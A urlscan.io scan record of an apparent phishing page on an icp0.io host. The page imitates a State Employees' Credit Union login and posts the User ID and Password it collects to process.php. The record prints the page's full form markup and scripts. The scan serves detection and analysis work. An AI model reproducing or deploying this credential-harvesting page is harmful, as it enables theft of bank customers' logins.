4burc-5aaaa-aaaad-qduua-cai.icp0.io Open in urlscan Pro
2a0b:21c0:b002:2:5000:afff:fee6:a836  Public Scan

URL: https://4burc-5aaaa-aaaad-qduua-cai.icp0.io/1/index.html
Submission: On December 02 via api from US — Scanned from CH

Form analysis 1 forms found in the DOM

POST process.php

<form method="post" action="process.php" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
  <div class="aspNetHidden">
    <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="">
    <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="">
    <input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="">
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="XL75mn06OSUNz/YpFbwfe9tlTQE0MOv9k62Y3POgKbU/uC8q7RyKSf1gXWYY+hiw7H
</div>

<script type=" text="" javascript"=""> //<!--[CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
    theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
        theForm.__EVENTTARGET.value = eventTarget;
        theForm.__EVENTARGUMENT.value = eventArgument;
        theForm.submit();
    }
}
//]]-->
    <script src="/enroll/WebResource.axd?d=pynGkmcFUV13He1Qd6_TZFXjl5sPyt9kOGWz236FVgWAlp2jOnHz37PrZqhXVhK9g2YwSg2&amp;t=636939665749177621" type="text/javascript"></script>
    <script src="/enroll/ScriptLib/md5.js" type="text/javascript"></script>
    <script src="/enroll/ScriptResource.axd?d=nv7asgRUU0tRmHNR2D6t1EekDsxKEwSZJpikhL_6bvVcyxhDFC5xzBMYL4n2T3xzyjsI9y5GDnWtqEMRDzYwpwEqiv8d0zyvxyVarszwga4VVGDKdqK_TSDL0_zGf2hYrzZ7Qw2&amp;t=4e518d44" type="text/javascript"></script>
    <script type="text/javascript">
      //<![CDATA[
      function Length_Validation(val) {
        var t = document.getElementById(val.controltovalidate); //element for control in question
        var v = t.value.replace(/\n/g, '  '); //text value of the control (need to double count new lines)
        if (v.length > val.MaximumLength) {
          return false;
        } else {
          return true;
        }
      }
      //]]>
    </script>
    <script type="text/javascript">
      //<![CDATA[
      function TogglePersistantPopup(InfoBoxClientID, TriggerElementID, direction, popupSpacing) {
        var IframeElement = document.getElementById(InfoBoxClientID + '_IFrame');
        var PopUpElement = document.getElementById(InfoBoxClientID + '_PopupCanvas');
        var PopUpDiv = $('#' + InfoBoxClientID + '_PopupDiv');
        var PopUpCanvas = $('#' + InfoBoxClientID + '_PopupCanvas');
        var PopupStatus = '' + document.getElementById(InfoBoxClientID + '_PopupDiv').style.display;
        if (PopUpDiv.hasClass('InfoBoxHover')) {
          PopUpCanvas.removeClass('InfoBoxHover'); //remove hover effect
          if (PopUpElement.style.display == 'block') {
            PopUpElement.style.display = '';
            $(PopUpElement).removeClass('InfoBoxPopup');
          } else {
            SetPositionForPopup(InfoBoxClientID, TriggerElementID, direction, popupSpacing);
            PopUpElement.style.display = 'block';
            $(PopUpElement).addClass('InfoBoxPopup');
          }
        } else if (IframeElement) { //iframe hack is on, use basic css display manipulation (doesnt work with slidetoggle)
          if (PopUpElement.style.display == 'block') {
            PopUpElement.style.display = '';
            $(PopUpElement).removeClass('InfoBoxPopup');
          } else {
            SetPositionForPopup(InfoBoxClientID, TriggerElementID, direction, popupSpacing);
            PopUpElement.style.display = 'block';
            $(PopUpElement).addClass('InfoBoxPopup');
          }
          IframeElement.style.display = PopUpElement.style.display;
          IframeElement.style.width = PopUpElement.offsetWidth;
          IframeElement.style.height = PopUpElement.offsetHeight;
          IframeElement.style.left = PopUpElement.offsetLeft;
          IframeElement.style.top = PopUpElement.offsetTop;
        } else { //use the fancy slideToggle animation
          var callback = function() {
            if ($(PopUpElement).hasClass('InfoBoxPopup')) {
              $(PopUpElement).removeClass('InfoBoxPopup');
              $(PopUpElement).css('display', ''); //undo the block set before the animation,clear out the inline display set by slideToggle, let the InfoBoxCanvas set the display
            } else {
              $(PopUpElement).addClass('InfoBoxPopup');
            }
          }
          if (!PopUpCanvas.hasClass('InfoBoxPopup')) {
            SetPositionForPopup(InfoBoxClientID, TriggerElementID, direction, popupSpacing);
          }
          if (PopUpCanvas.hasClass('InfoBoxHover')) { // turn a hover into a popup - this just turns it on, no fancy slideToggle
            $(PopUpElement).addClass('InfoBoxPopup').removeClass('InfoBoxHover');
          } else {
            if (direction == 5) {
              PopUpCanvas.css('overflow', 'hidden').css('display', 'block');
              PopUpDiv.css('width', PopUpDiv.width()).animate({
                marginLeft: parseInt(PopUpDiv.css('marginLeft'), 10) == 0 ? -PopUpDiv.outerWidth() : 0
              }, callback);
            } else if (direction == 7) {
              PopUpCanvas.css('overflow', 'hidden').css('display', 'block');
              PopUpDiv.css('width', PopUpDiv.width()).animate({
                marginLeft: parseInt(PopUpDiv.css('marginLeft'), 10) == 0 ? PopUpDiv.outerWidth() : 0
              }, callback);
            } else {
              PopUpCanvas.slideToggle(callback);
            }
          }
        }
      }

      function HideInfoBoxHover(InfoBoxClientID, TriggerElementID, direction, popupSpacing) {
        var IframeElement = document.getElementById(InfoBoxClientID + '_IFrame');
        var PopUpElement = document.getElementById(InfoBoxClientID + '_PopupCanvas');
        var PopUpCanvas = $('#' + InfoBoxClientID + '_PopupCanvas');
        var PopUpDiv = $('#' + InfoBoxClientID + '_PopupDiv');
        if (IframeElement) { //iframe hack is on, use basic css display manipulation (doesnt work with slidetoggle)
          $(PopUpElement).removeClass('InfoBoxHover');
          IframeElement.style.display = 'none';
          IframeElement.style.width = PopUpElement.offsetWidth;
          IframeElement.style.height = PopUpElement.offsetHeight;
          IframeElement.style.left = PopUpElement.offsetLeft;
          IframeElement.style.top = PopUpElement.offsetTop;
        } else {
          $(PopUpElement).removeClass('InfoBoxHover');
        }
      }

      function ShowInfoBoxHover(InfoBoxClientID, TriggerElementID, direction, popupSpacing) {
        var IframeElement = document.getElementById(InfoBoxClientID + '_IFrame');
        var PopUpElement = document.getElementById(InfoBoxClientID + '_PopupCanvas');
        var PopUpCanvas = $('#' + InfoBoxClientID + '_PopupCanvas');
        var PopUpDiv = $('#' + InfoBoxClientID + '_PopupDiv');
        //if not a persistant popup...//var PopupStatus = '' + document.getElementById(InfoBoxClientID + '_PopupDiv').style.display;
        if (!$(PopUpElement).hasClass('InfoBoxPopup')) {
          SetPositionForHover(InfoBoxClientID, TriggerElementID, direction, popupSpacing);
          if (IframeElement) { //iframe hack is on, use basic css display manipulation (doesnt work with slidetoggle)
            $(PopUpElement).addClass('InfoBoxHover');
            IframeElement.style.display = 'block';
            IframeElement.style.width = PopUpElement.offsetWidth;
            IframeElement.style.height = PopUpElement.offsetHeight;
            IframeElement.style.left = PopUpElement.offsetLeft;
            IframeElement.style.top = PopUpElement.offsetTop;
          } else {
            $(PopUpElement).addClass('InfoBoxHover').children(':first').css('margin-left', '');
          }
        }
      }

      function SetPositionForHover(InfoBoxClientID, TriggerElementID, direction, popupSpacing) {
        var PopUpDiv = $('#' + InfoBoxClientID + '_PopupDiv');
        var PopUpCanvas = $('#' + InfoBoxClientID + '_PopupCanvas');
        var TriggerElement = $('#' + TriggerElementID);
        var triggerOffset = TriggerElement.position();
        var imgHeight = TriggerElement.height();
        var imgWidth = TriggerElement.width();
        var viewportWidth = $(window).width();
        var viewportHeight = $(window).height();
        var divWidth = PopUpCanvas.width();
        var divHeight = PopUpCanvas.height(); //alert(divWidth + '...' + divHeight);
        SetPosition(PopUpCanvas, direction, popupSpacing, triggerOffset, imgHeight, imgWidth, divHeight, divWidth);
      }

      function SetPositionForPopup(InfoBoxClientID, TriggerElementID, direction, popupSpacing) {
        var PopUpDiv = $('#' + InfoBoxClientID + '_PopupDiv');
        var PopUpCanvas = $('#' + InfoBoxClientID + '_PopupCanvas');
        var TriggerElement = $('#' + TriggerElementID);
        var triggerOffset = TriggerElement.position();
        var imgHeight = TriggerElement.height();
        var imgWidth = TriggerElement.width();
        var viewportWidth = $(window).width();
        var viewportHeight = $(window).height();
        PopUpCanvas.addClass('InfoBoxTemp'); //turn in on, but keep it hidden so height,width exist
        PopUpDiv.addClass('InfoBoxTemp'); //turn in on, but keep it hidden so height,width exist
        var divWidth = PopUpCanvas.width();
        var divHeight = PopUpCanvas.height();
        //check if the infobox is bigger than the viewport, if so shrink it
        if (viewportWidth < divWidth) {
          PopUpCanvas.width(viewportWidth);
          divWidth = PopUpCanvas.width();
        }
        PopUpCanvas.removeClass('InfoBoxTemp'); //back to what they started at
        PopUpDiv.removeClass('InfoBoxTemp'); //back to what they started at
        SetPosition(PopUpCanvas, direction, popupSpacing, triggerOffset, imgHeight, imgWidth, divHeight, divWidth);
        RePosition(PopUpCanvas, PopUpDiv, divHeight, divWidth);
      }

      function SetPosition(PopUpCanvas, direction, popupSpacing, triggerOffset, imgHeight, imgWidth, divHeight, divWidth) {
        var viewportWidth = $(window).width();
        var viewportHeight = $(window).height();
        if (direction == 4) {
          PopUpCanvas.css('top', triggerOffset.top).css('left', triggerOffset.left + imgWidth + popupSpacing)
        } else if (direction == 5) {
          PopUpCanvas.css('top', triggerOffset.top + (imgHeight / 2) - (divHeight / 2)).css('left', triggerOffset.left + imgWidth + popupSpacing)
        } else if (direction == 6) {
          //use bottom to slide up for slideToggle, clear out top that RePosition may set=
          PopUpCanvas.css('top', '').css('left', triggerOffset.left + imgWidth + popupSpacing).css('bottom', viewportHeight - triggerOffset.top - imgHeight - popupSpacing);
        } else if (direction == 7) {
          PopUpCanvas.css('top', triggerOffset.top + (imgHeight / 2) - (divHeight / 2)).css('left', triggerOffset.left - divWidth - popupSpacing)
        } else if (direction == 8) {
          //use bottom to slide up for slideToggle, clear out top that RePosition may set=
          PopUpCanvas.css('top', '').css('left', triggerOffset.left + (imgWidth / 2) - (divWidth / 2)).css('bottom', viewportHeight - triggerOffset.top + popupSpacing);
        } else if (direction == 1) {
          PopUpCanvas.css('top', triggerOffset.top + imgHeight + popupSpacing).css('left', (triggerOffset.left + imgWidth) - divWidth)
        } else if (direction == 3) {
          PopUpCanvas.css('top', triggerOffset.top + imgHeight + popupSpacing).css('left', triggerOffset.left + (imgWidth / 2) - (divWidth / 2))
        } else {
          // this is BottomRight
          PopUpCanvas.css('top', triggerOffset.top + imgHeight + popupSpacing).css('left', triggerOffset.left)
        }
      }

      function RePosition(PopUpCanvas, PopUpDiv, divHeight, divWidth) {
        var viewportWidth = $(window).width();
        var viewportHeight = $(window).height();
        var viewportScrollTop = $(window).scrollTop();
        var viewportScrollLeft = $(window).scrollLeft();
        //here we check if the infobox is popping up off the screen.   Reposition it so it is within the viewport
        PopUpCanvas.addClass('InfoBoxTemp'); //turn in on, but keep it hidden so height,width exist
        PopUpDiv.addClass('InfoBoxTemp'); //turn in on, but keep it hidden so height,width exist
        var divPosition = PopUpCanvas.position();
        var divTop = parseInt(divPosition.top);
        var divLeft = parseInt(divPosition.left);
        PopUpCanvas.removeClass('InfoBoxTemp'); //back to what they started at
        PopUpDiv.removeClass('InfoBoxTemp'); //back to what they started at
        //too far down
        if ((viewportScrollTop + viewportHeight) < (divTop + divHeight)) {
          //alert('TOO FAR DOWN: viewportscrolltop=' + viewportScrollTop + ',viewportheight=' + viewportHeight+ ',divcsstop=' + parseInt(divPosition.top) + ',divheight=' + divHeight);alert('setting top to: ' + (viewportScrollTop+viewportHeight-divHeight));
          PopUpCanvas.css('bottom', '').css('top', (viewportScrollTop + viewportHeight - divHeight));
        }
        //too far right
        if ((viewportScrollLeft + viewportWidth) < (divLeft + divWidth)) {
          //alert('too far right!');
          PopUpCanvas.css('left', viewportScrollLeft + viewportWidth - divWidth);
        }
        //too far up
        if (viewportScrollTop > divTop) {
          //alert('too far up!');
          //alert('BEFORE   viewporttop:' + viewportScrollTop + ',popuptop:' + divPosition.top);
          PopUpCanvas.css('bottom', '').css('top', viewportScrollTop);
          //alert('AFTER    viewporttop:' + viewportScrollTop + ',popuptop:' + divPosition.top);
        }
        //too far left
        if (viewportScrollLeft > divLeft) {
          //alert('too far left!');
          PopUpCanvas.css('left', viewportScrollLeft);
        }
      }
      //]]>
    </script>
    <script src="/enroll/ScriptResource.axd?d=D9drwtSJ4hBA6O8UhT6CQl5kP-DNk5tqsFSKE4QAx7FiqQUkfG0xcYhM38F4ULHzEsr3ccm3WWC8c21Rx1XAbPd7dZSDwlwAN3FBxOF0-Op5UR1aFNYrVvCtHrsmIFUrjLaB6c2og1ihVr9uj93NAWWK3N01&amp;t=ffffffffa580202a" type="text/javascript">
    </script>
    <script type="text/javascript">
      //<![CDATA[
      if (typeof(Sys) === 'undefined') throw new Error('ASP.NET Ajax client-side framework failed to load.');
      //]]>
    </script>
    <script src="/enroll/ScriptResource.axd?d=JnUc-DEDOM5KzzVKtsL1tcXbu1D4Hj6yCmHmr9cM66AViK3ia2ZDHVT7KW47KHMyBMtKHFfS1WB4puAzjXwId5XQy_jrygJTcv1Xors3xQgEJuGStAVwV63p2PylRvqJXzAeOswFDaHhtAK0W-ax5ffg3ZOYXYmQ06Ttk8PaI-ZJmv_M0&amp;t=ffffffffa580202a"
      type="text/javascript"></script>
    <script src="ScriptLib/DotNetScripts_v4.js" type="text/javascript"></script>
    <script src="ScriptLib/AriaLib.js" type="text/javascript"></script>
    <script src="Scripts/jquery-1.10.2.js" type="text/javascript"></script>
    <script type="text/javascript">
      //<![CDATA[
      function WebForm_OnSubmit() {
        if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
        return true;
      }
      //]]>
    </script>
    <div class="aspNetHidden">
      <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="0A0E1CD6">
      <input type="hidden" name="__VIEWSTATEENCRYPTED" id="__VIEWSTATEENCRYPTED" value="">
      <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION"
        value="nITEzXuHg0ltvi8axIDoU6FgeyjK1CODcX0SuolbSD8Qfzzu/P9rH+y2oqsmif1wPVeXKy8FrWBXEanpTJ0z20fVfdUPGvhZgYSi57O16eL9SEGB8Nb3CCWmPqEHahsF5avYUTmz2E90C5v+4mhgQcuAVSbC8BJe3PjJvFWbfV+3wkJCg/33wt99B7qRZhjTE9AsNLpDfUTA9g+t0HvSRZPGQildCnS95v3wCCHWVBt9v9Kl+GXnYOResxiOHuDjmffC48IXSpUYWes9gEGBW3xHJTWOx4UTRRUwaMOPNpyNwoTF">
    </div>
    <script type="text/javascript">
      //<![CDATA[
      Sys.WebForms.PageRequestManager._initialize('ctl00$ctl00$ScriptManager1', 'aspnetForm', ['tctl00$ctl00$PageBody$PageContent$ctl12', '', 'tctl00$ctl00$PageBody$PageContent$enrollmentFormUpdatePanel', ''], [], [], 90, 'ctl00$ctl00');
      //]]>
    </script>
    <div id="pgBody">
      <div id="header">
        <div>
          <h1>State Employees’ Credit Union</h1>
          <p class="skip"><a id="skip" class="skip" href="#pgMain" title="Skip navigation">Skip page header and navigation</a></p>
        </div>
        <div id="topBar">
          <a href="https://www.alaskausa.org/?t=tn" id="logo" title="State Employees’ Credit Union products for you"><img src="https://www.ncsecu.org/Images/state-employees-credit-union-logo@2x.png" alt="State Employees’ Credit Union products for you"></a>
          <!--<p id="headerReturnLink"><a href="https://www.alaskausa.org/?t=eh" title="Home">Return to home</a></p>-->
          <p id="topBarMenu">
            <a href="https://www.alaskausa.org">
					<span>Return to home</span>
				</a>
          </p>
        </div>
      </div>
      <div class="pgTitle">
        <h1>Enter You User ID and Password</h1>
      </div>
      <div id="pgMain" class="pgMain">
        <div class="row">
          <div onkeypress="javascript:return WebForm_FireDefaultButton(event, 'SubmitButton')">
            <div class="leftCol">
              <div data-val-showmessagebox="True" data-val-showsummary="False" data-val-validationgroup="enrollmentValidation" id="ctl00_ctl00_PageBody_PageContent_ctl06" data-valsummary="true" style="display:none;">
              </div>
              <h2 style="margin-top:0; margin-bottom:8px;"></h2>
              <table class="dataForm topDataForm">
                <tbody>
                  <tr>
                    <th scope="row"><label id="firstNameLabel">User ID*</label></th>
                    <td>
                      <input name="userid" type="text" id="q3" tabindex="1" aria-labelledby="q1" onblur="setConsentName();" required="">
                    </td>
                  </tr>
                  <tr>
                    <th scope="row"><label id="firstNameLabel">Password*</label></th>
                    <td>
                      <input name="password" type="password" id="q3" tabindex="1" aria-labelledby="q1" onblur="setConsentName();" required="">
                    </td>
                  </tr>
                </tbody>
              </table>
              <div id="ctl00_ctl00_PageBody_PageContent_enrollmentFormUpdatePanel">
                <table class="dataForm bottomDataForm">
                  <tbody>
                  </tbody>
                </table>
              </div>
              <input type="submit" name="ctl00$ctl00$PageBody$PageContent$SubmitButton" value="Login"
                onclick="setupMessage();WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;ctl00$ctl00$PageBody$PageContent$SubmitButton&quot;, &quot;&quot;, true, &quot;enrollmentValidation&quot;, &quot;&quot;, false, false))"
                id="SubmitButton" tabindex="1">
            </div>
            <div id="loadingSection" class="results" style="display:none;">
              <div id="loadingMsg"></div>
              <input type="hidden" name="ctl00$ctl00$PageBody$PageContent$returnedResults" id="returnedResults" value="false">
            </div>
            <span id="ctl00_ctl00_PageBody_PageContent_testResponse"></span>
            <div style="display:none;"><span id="ctl00_ctl00_PageBody_PageContent_dummyInfoBox" class=""
                style=""><a id="ctl00_ctl00_PageBody_PageContent_dummyInfoBox_dummyInfoBox_OpenLink" onclick="TogglePersistantPopup('ctl00_ctl00_PageBody_PageContent_dummyInfoBox','ctl00_ctl00_PageBody_PageContent_dummyInfoBox_dummyInfoBox_OpenLink',1,1);CancelEvent(event);return false;" href="#" target="InfoBox">Dummy</a></span>
              <div id="ctl00_ctl00_PageBody_PageContent_dummyInfoBox_PopupCanvas" style="width:300px;" class="InfoBoxCanvas">
                <div id="ctl00_ctl00_PageBody_PageContent_dummyInfoBox_PopupDiv" style="" class="InfoBox"><img id="ctl00_ctl00_PageBody_PageContent_dummyInfoBox_dummyInfoBox_CloseImage" class="InfoBox_CloseImage"
                    onclick="TogglePersistantPopup('ctl00_ctl00_PageBody_PageContent_dummyInfoBox','ctl00_ctl00_PageBody_PageContent_dummyInfoBox_dummyInfoBox_OpenLink',1,1);CancelEvent(event);return false;"
                    src="App_Themes/DefaultTheme/ControlImages/close.png" alt="Close Popup">Need this because the infoboxes are hidden on initial page load --js isn't rendered during postback-- so infobox doesn't work</div>
              </div>
            </div>
            <script>
              function validate_hasVisa(sender, args) {
                args.IsValid = $("$(input[name$='$hasVisa']:checked").length > 0;
              }

              function clickVisa() {
                $("#hasVisa_hidden").val("clicked");
                ControlValidate("hasVisa_hidden");
              }

              function clickAutoLoan() {
                $("#hasAutoLoan_hidden").val("clicked");
                ControlValidate("hasAutoLoan_hidden");
              }

              function clickPaidAutoLoan() {
                $("#hasPaidAutoLoan_hidden").val("clicked");
                ControlValidate("hasPaidAutoLoan_hidden");
              }

              function ControlValidate(id) {
                var c = document.getElementById(id);
                if (typeof(c.Validators) != "undefined") {
                  for (var i = 0; i < c.Validators.length; i++) {
                    ValidatorValidate(c.Validators[i]);
                  }
                }
              }

              function isPageValid() {
                if (typeof(Page_Validators) != "undefined") {
                  for (var i = 0; i < Page_Validators.length; i++) {
                    var validator = Page_Validators[i];
                    ValidatorValidate(validator); //make sure it's been checked
                    //console.log(validator.id + ":" + validator.isvalid);
                    if (!validator.isvalid) {
                      return false;
                    }
                  }
                }
                return true;
              }

              function setupMessage() {
                if (isPageValid()) {
                  //when the postback returns, all of this will be undone -- hopefully the postback turns other stuff on
                  $("#SubmitButton").css('disabled', true);
                  ShowLoading(); //in DotNetScripts_v4
                  $(".message", "#LoadingContainer").css("background", "none").css("padding-left", "1px").css("padding-right", "28px"); //remove the spinner, it doesn't spin in IE
                  $(".inner", "#LoadingContainer").prepend("<div class=\"small progress\"><div>Loading</div></div>"); //add in the css spinner
                  setTimeout(function() {
                    $(".inner", "#LoadingContainer").css("width", "300px").css("padding-top", "10px");
                    $(".message:first", "#LoadingContainer").html("Validating");
                    $(".inner", "#LoadingContainer").append(
                    "<div class=\"message\" style=\"margin-top:5px;font-size:1em;background:none;padding-left:inherit;\"><div>This may take a minute.</div><div>Please do not refresh this page.</div></div>");
                    $(".message", "#LoadingContainer").css("line-height", "inherit");
                  }, 300);
                  //setTimeout(function () { if ($("#returnedResults").val() != "true") { $("#loadingMsg").hide(); $("#loadingSection").show(); $("#warningSection_timeout").show(); } }, 89 * 1000);
                  return true;
                } else {
                  return false;
                }
              }
              //function testPost() {
              //	$.post("http://akusaappsdev/ubenrollment/api/decision/enroll", { "enroll_firstName": "test" },
              //		function (result) { alert(result); });
              //}
              function setConsentName() {
                var first = $.trim($("#firstName").val());
                var last = $.trim($("#lastName").val());
                var suffix = $.trim($("#suffix").val());
                if (first != "" && last != "") {
                  $("#consent_applicantName").text(", " + $.trim(first + " " + last + " " + suffix).toUpperCase() + ",");
                } else {
                  $("#consent_applicantName").text("");
                }
              }
            </script>
          </div>
        </div>
      </div>
    </div>
    <div style="clear:both;"></div>
    <script>
      $(document).ready(function() {
        //$('a[class*=leanModal]').leanModal({ top: 200, closeButton: ".modal_close" });
        initializeMasks();
        $(document).on("click", ".dataForm input:radio", function() {
          selectRadio(this);
        });
        //$("#firstName").focus();
      });

      function initializeMasks() {
        //$(".ssnField").prop('placeholder', 'xxx-__-____').mask("xxx-99-9999", { autoclear: false });
        //$(".dateField").prop('placeholder', '__/__/____').mask("99/99/9999", { autoclear: false });
        $(".ssnField").prop('placeholder', 'xxx-__-____').mask("xxx-99-9999", {
          placeholder: "xxx-__-____",
          autoclear: false
        });
        $(".dateField").prop('placeholder', '__/__/____').mask("99/99/9999", {
          placeholder: '__/__/____',
          autoclear: false
        });
        initializeVisaMask();
        //in IE11 .mask steals focus.  This left the cursor in the visa debit card question.  Moving focus fired the validators.  So we move focus and clear the error
        setTimeout(function() {
          $("#firstName").focus();
        }, 500);
        setTimeout(function() {
          Page_ClientValidateReset()
        }, 550);
      }

      function initializeVisaMask() {
        //in a separate function so it can be re-initialized separate from the others
        $("#visaDebitCardNumber").prop('placeholder', '__  ____  ____').mask("99  9999  9999", {
          placeholder: '__  ____  ____',
          autoclear: false
        });
      }

      function selectRadio(elem) {
        $(elem).closest("div[role=radiogroup]").find("input:radio").each(function() {
          $(this).closest("label").removeClass("radioSelected");
        });
        $(elem).closest("label").addClass("radioSelected");
      }

      function reselectAllRadios() {
        $(".dataForm input:radio:checked").each(function() {
          selectRadio(this);
        });
      }

      function Page_ClientValidateReset() {
        if (typeof(Page_Validators) != "undefined") {
          for (var i = 0; i < Page_Validators.length; i++) {
            var validator = Page_Validators[i];
            validator.isvalid = true;
            ValidatorUpdateDisplay(validator);
            //console.log(validator.id + "<br>");
          }
        }
      }
    </script>
  </div>
</form>

Text Content

//



STATE EMPLOYEES€™ CREDIT UNION

Skip page header and navigation

Return to home


ENTER YOU USER ID AND PASSWORD

User ID* Password*




Dummy
Need this because the infoboxes are hidden on initial page load --js isn't
rendered during postback-- so infobox doesn't work


Return to home

State Employees Credit Union are registered trademarks of State Employees’
Credit Union

© Copyright 2022